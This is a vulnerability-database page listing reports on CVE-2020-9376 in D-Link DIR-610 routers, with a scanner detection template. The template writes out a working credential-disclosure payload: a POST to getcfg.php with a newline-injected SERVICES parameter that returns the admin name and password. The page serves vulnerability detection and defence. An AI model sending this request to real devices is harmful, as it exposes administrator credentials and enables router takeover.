| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2020-9376 | 12 Dec 202213:30 | – | circl | |
| D-Link DIR-610 Information Disclosure Vulnerability | 12 Jul 202000:00 | – | cnvd | |
| CVE-2020-9376 | 9 Jul 202012:08 | – | cve | |
| CVE-2020-9376 | 9 Jul 202012:08 | – | cvelist | |
| DLink DIR-610 Multiple Vulnerabilities | 9 Feb 202400:00 | – | nessus | |
| CVE-2020-9376 | 9 Jul 202013:15 | – | nvd | |
| D-Link DIR-610 Rev. A Devices Multiple Vulnerabilities | 22 Feb 202300:00 | – | openvas | |
| Information disclosure | 9 Jul 202013:15 | – | prion | |
| PT-2020-20620 · D Link · Dir-610 | 9 Jul 202000:00 | – | ptsecurity | |
| CVE-2020-9376 | 22 May 202517:35 | – | redhatcve |
id: CVE-2020-9376
info:
name: D-Link DIR-610 Devices - Information Disclosure
author: whynotke
severity: high
description: |
D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
impact: |
An attacker can gain sensitive information from the device, leading to potential unauthorized access or further attacks.
remediation: |
Apply the latest firmware update provided by D-Link to fix the vulnerability.
reference:
- https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
- https://www.dlink.com.br/produto/dir-610/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9376
- https://github.com/Z0fhack/Goby_POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-9376
cwe-id: CWE-74
epss-score: 0.16586
epss-percentile: 0.96613
cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: dlink
product: dir-610_firmware
tags: cve,cve2020,dlink,disclosure,router,vuln
http:
- method: POST
path:
- "{{BaseURL}}/getcfg.php"
body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<name>Admin</name>"
- "</usrid>"
- "</password>"
condition: and
- type: status
status:
- 200
# digest: 4b0a0048304602210090793549bcb9cf70b12cb64dad3cd405a6fcc111e5b608d7270b5310eecbd952022100d96b2999a169b1580cd65792010e9ac5951c5d1e36abd1c46638fa60b6a62b9a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation